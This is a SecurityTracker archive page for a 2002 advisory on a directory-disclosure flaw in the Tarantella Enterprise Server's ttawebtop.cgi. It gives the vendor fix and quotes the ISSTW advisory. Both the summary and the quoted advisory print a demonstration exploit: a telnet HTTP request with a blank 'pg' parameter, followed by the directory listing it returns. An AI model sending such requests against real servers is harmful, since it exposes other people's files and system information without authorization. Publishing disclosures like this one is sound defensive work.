SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Web Server/CGI)  >   Tarantella Vendors:   Tarantella, Inc.
Tarantella Enterprise Server 'ttawebtop.cgi' Bug Discloses Files and Directories to Remote Users
SecurityTracker Alert ID:  1003350
SecurityTracker URL:  http://securitytracker.com/id/1003350
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jan 24 2002
Impact:   Disclosure of system information, Disclosure of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 3.20 on SPARC Solaris and Intel Linux, 3.1x on all operating systems, and 3.0x on all operating systems
Description:   ISSTW issued an advisory warning of an information disclosure vulnerability in the Tarantella Enterprise server. A remote user can view files and directories within certain directories on the server.

It is reported that a remote user can send a URL request to the ttawebtop.cgi with a blank parameter to view directory contents. A demonstration exploit transcript is provided:

shell$ telnet tarantella.somewhere.com 80
Trying 12.34.56.78...
Connected to 12.34.56.78.
Escape character is '^]'.
GET /cgi-bin/ttawebtop.cgi/?action=start&pg= HTTP/1.0

HTTP/1.1 200 OK
Date: Fri, 21 Dec 2001 11:34:39 GMT
Server: Apache/1.3.4 (Unix)
Content-length: 512
Connection: close
Content-Type: text/html

?C . .. 4 cgi-bin ?E direct.html
on examples ?
help ?Y
index.html ?Z index2.html ?[
kiosk.html ?\ kiosk2.html ?] loader.html %
mac -v resources
native 5 java ?w index2.html.orig
o modules b tsp les
x resources.3_11.tar ,w
resources.old

The vendor notes that ttawebtop.cgi does not properly validate that it is processing files contained within the Tarantella document root. A remote user can view files that are readable by the web server (typically with "nobody" privileges) that are located in the following directories:

- The web server's document root
- Files and directories for which an "Alias" (Apache web servers) or "Additional Document Directory" (Netscape/iPlanet web servers) has been configured.

The exposed files are reportedly accessed via UNIX system calls within the CGI, not via the web server. As a result, web server file protection configurations will not prevent the vulnerability.

Impact:   A remote user can view files and directories within certain directories on the server.
Solution:   The vendor has released a fix. To remove the vulnerability for affected 3.20 and 3.11 installations, replace the installed ttawebtop.cgi binary with a new, fixed ttawebtop.cgi binary available from the software updates pages of the Tarantella Support site:

http://www.tarantella.com/support/updates/

This binary is currently available for SPARC Solaris and Intel Linux platforms. Binaries for further platforms will become available in due course.

Maintenance customers with earlier versions of the product are entitled and encouraged to upgrade to version 3.20 and apply the security update, as part of their maintenance contract. All other customers should contact their local Tarantella representative for details of other update paths.

The vendor reports that this vulnerability will be removed from future releases of Tarantella Enterprise 3 software.

Vendor URL:  www.tarantella.com/security/bulletin-03.html (Links to External Site)
Cause:   Access control error, Input validation error
Underlying OS:  Linux (Caldera/SCO), Linux (Red Hat Linux), Linux (SuSE), Linux (Turbo Linux), UNIX (AIX), UNIX (HP/UX), UNIX (Open UNIX-SCO), UNIX (Solaris - SunOS), UNIX (Tru64)

Message History:   None.


 Source Message Contents

Subject:  ISSTW Security Advisory Tarantella Enterprise 3.11.903 Directory Index Disclosure Vulnerability


ISSTW Security Advisory (ISSTW200201)
Tarantella Enterprise 3.11.903 Directory Index Disclosure Vulnerability

Discovery Date: Fri, 21 Dec 2001
----------------------------------------------------------------------


Overview:
---------
ISSTW Tiger-Force discovered a vulnerability in Tarantella Enterprise 3
that will reveal directory content with the use of blank parameter.


Problem Description:
--------------------
Tarantella Enterprise 3 is a non-intrusive application/data centralization
solution. End users can access enterprise resources via the web interface.
The vulnerability will allow a malicious user to review the directory content.


Exploit:
--------
shell$ telnet tarantella.somewhere.com 80
Trying 12.34.56.78...
Connected to 12.34.56.78.
Escape character is '^]'.
GET /cgi-bin/ttawebtop.cgi/?action=start&pg= HTTP/1.0

HTTP/1.1 200 OK
Date: Fri, 21 Dec 2001 11:34:39 GMT
Server: Apache/1.3.4 (Unix)
Content-length: 512
Connection: close
Content-Type: text/html

   on    examples      ?    
help      ?Y  
index.html    ?Z   index2.html   ?[  
kiosk.html    ?\   kiosk2.html   ?]   loader.html   %
  mac   -v   resources
native   5     java      ?w    index2.html.orig      
x    resources.3_11.tar    ,w 
resources.old 


Tested Platform:
---------------
Tarantella Enterprise 3.11.903


Tested OS:
----------
Solaris 7 (Sparc)


Patch Information:
------------------
http://www.tarantella.com/security/bulletin-03.html


Credit:
-------
This vulnerability was discovered and researched by 
Chieh-Chun Lin (cclin@iss.com.tw)

Disclaimer:

All information in these advisories are subject to change without
any advanced notices neither mutual consensus, and each of them 
is released as it is. ISSTW. is not responsible for any risks of
occurrences caused by applying those information. 



 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, SecurityGlobal.net LLC